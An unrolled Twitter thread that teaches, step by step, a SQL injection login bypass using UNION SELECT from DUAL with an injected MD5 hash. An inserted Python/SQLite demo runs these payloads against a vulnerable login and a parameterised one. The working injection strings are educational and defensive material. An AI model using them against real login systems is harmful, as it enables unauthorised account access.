ro
Aug 25 • 11 tweets • 6 min read
#Learn365 - Day 6⃣

Can you identify and exploit the #security bug? 🤔

In today's thread let's learn about exploit writing 🧵👇

#infosec #appsec #bugbountytips #security
This is SQLi, easy to guess. Which field is vulnerable? The username.

But the tricky part is how to exploit it.
If you dissect the code, you would notice that the SQL statement should always return one single value. Otherwise the comparison in the PHP code will fail anyway.

What next ?
What do you think will happen if I input:

" or 1=1;--

Think first !!
.
.
.
.
.
.
This will make the SQL return the entire password column.
In turn, the PHP check will fail at line #2.

So, you have to make the SQL statement return one single value, and that should be a password which you can match.
If you want to achieve that, you cannot use the generic 1=1 payload.

You know that in SQL there are UNIONs, right? Can we use them?

Can we use a UNION to return a password which matches the check in the PHP?

I think yes !!
Go on !!
Slight detour: in SQL you can select whatever literal value you want. You know there is the DUAL table? A dummy table.

SELECT 'sec_r0' from DUAL;

This will dump a single value `sec_r0` in the output.
.
.
.
.
.
Can we use something like this to return a password of our own choosing?
Let's see the modified SQL query with a UNION statement:

" or 1=1 UNION (SELECT 'sec_r0' from DUAL) ; --

What do you think this would do?
.
.
.
.
THINK
.
.
.
.
This will dump the entire password column with the last value being one of our own choosing, right?
But we don't want the password column!
If we don't want the password column, can we remove the results of the first table of the UNION completely?

<table1> UNION <table2>

where
table1's output comes from

SELECT password from USER where username="" or 1=1

and the entire table is dumped because of 1=1. What if we negate it?
Yes, that's the magic. Now see the payload.

" or 1!=1 UNION (SELECT 'sec_r0' from DUAL) ; --

.
.
.
.
THINK
.
.
.
.
This negates the first table's query completely, so only 'sec_r0' is returned in the output, yes?

That's the magic of UNION.
Are we done?

Is this our final exploit?
.
.
.
.
No.
Why?
Because the PHP assumes the passwords are stored as MD5 hashes. That's why the input password is first MD5-hashed and then compared.

So guess what the perfect exploit would be.
Let's calculate the MD5 of sec_r0.
MD5(sec_r0) = ccf0d111cd0c1e45708a0aef7b2bcb74

So in the payload I would put:
" or 1!=1 UNION (SELECT 'ccf0d111cd0c1e45708a0aef7b2bcb74' from DUAL) ; --

and in the password input I would put sec_r0.

And bingo.
I bypass the auth.
Isn't that amazing?
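To make the reasoning above concrete, here is an added example that is not the thread's own code: a Python/SQLite stand-in for the PHP/MySQL login the thread describes, with the vulnerable string-built query beside its parameterised form. The data (two users with MD5 hashes, a one-row DUAL table) is constructed here; the requirement that exactly one row comes back and equals MD5(password) is my reading of the thread's "one single word" remark, not code from the thread. SQLite delimits strings with single quotes and does not accept a parenthesised SELECT after UNION, so the thread's three payloads are adapted accordingly; the MD5 tag is computed rather than copied from the thread.

```python
import hashlib
import hmac
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not from the thread): two users storing MD5
    password hashes, plus a one-row DUAL table so 'FROM DUAL' parses in SQLite."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USER (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO USER VALUES (?, ?)",
        [("alice", hashlib.md5(b"correct horse").hexdigest()),
         ("bob", hashlib.md5(b"battery staple").hexdigest())],
    )
    conn.execute("CREATE TABLE DUAL (dummy TEXT)")
    conn.execute("INSERT INTO DUAL VALUES ('X')")
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Model of the PHP logic the thread describes: the username is pasted into
    the SQL text, and the single returned value must equal MD5(password).
    Assumption: anything other than exactly one returned row fails the check."""
    sql = f"SELECT password FROM USER WHERE username='{username}'"
    rows = conn.execute(sql).fetchall()
    if len(rows) != 1:
        return False
    return rows[0][0] == hashlib.md5(password.encode()).hexdigest()


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: the username is bound as a parameter, so quotes, OR and
    UNION inside it are just characters of a value, never SQL syntax.
    The hash comparison is done in constant time."""
    row = conn.execute(
        "SELECT password FROM USER WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], hashlib.md5(password.encode()).hexdigest())


def run_thread_payloads(conn: sqlite3.Connection) -> dict:
    """Submit the thread's three usernames (quote and parentheses adapted to
    SQLite) with 'sec_r0' as the password; returns {name: (vulnerable, safe)}."""
    tag = hashlib.md5(b"sec_r0").hexdigest()  # computed here, not copied from the thread
    payloads = {
        "or_1_eq_1": "' or 1=1 ; --",                                   # whole column back
        "union_1_eq_1": f"' or 1=1 UNION SELECT '{tag}' FROM DUAL ; --",  # column + our tag
        "union_1_ne_1": f"' or 1!=1 UNION SELECT '{tag}' FROM DUAL ; --",  # only our tag
    }
    return {
        name: (vulnerable_login(conn, p, "sec_r0"), safe_login(conn, p, "sec_r0"))
        for name, p in payloads.items()
    }


if __name__ == "__main__":
    db = make_db()
    print("legitimate login:", vulnerable_login(db, "alice", "correct horse"),
          safe_login(db, "alice", "correct horse"))
    for name, (vuln, safe) in run_thread_payloads(db).items():
        print(f"{name}: vulnerable={vuln} safe={safe}")
```

Only the third payload logs in against `vulnerable_login`, exactly as the thread argues: the first two return more than one row. Against `safe_login` all three fail, because the bound parameter is looked up as a literal username and no such user exists. Parameterisation is the fix for the injection; the unsalted MD5 storage is a separate weakness (fast to brute-force, no salt) that should be replaced with a purpose-built password hash such as `hashlib.pbkdf2_hmac` or `hashlib.scrypt`.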

Keep this tweet bookmarked. You never know if someone asks you this in an interview.

Also,
if you like the way I explained it, consider retweeting the thread.
And stay tuned (follow @sec_r0) for more such interesting threads.

I am running #Learn365 ❤️
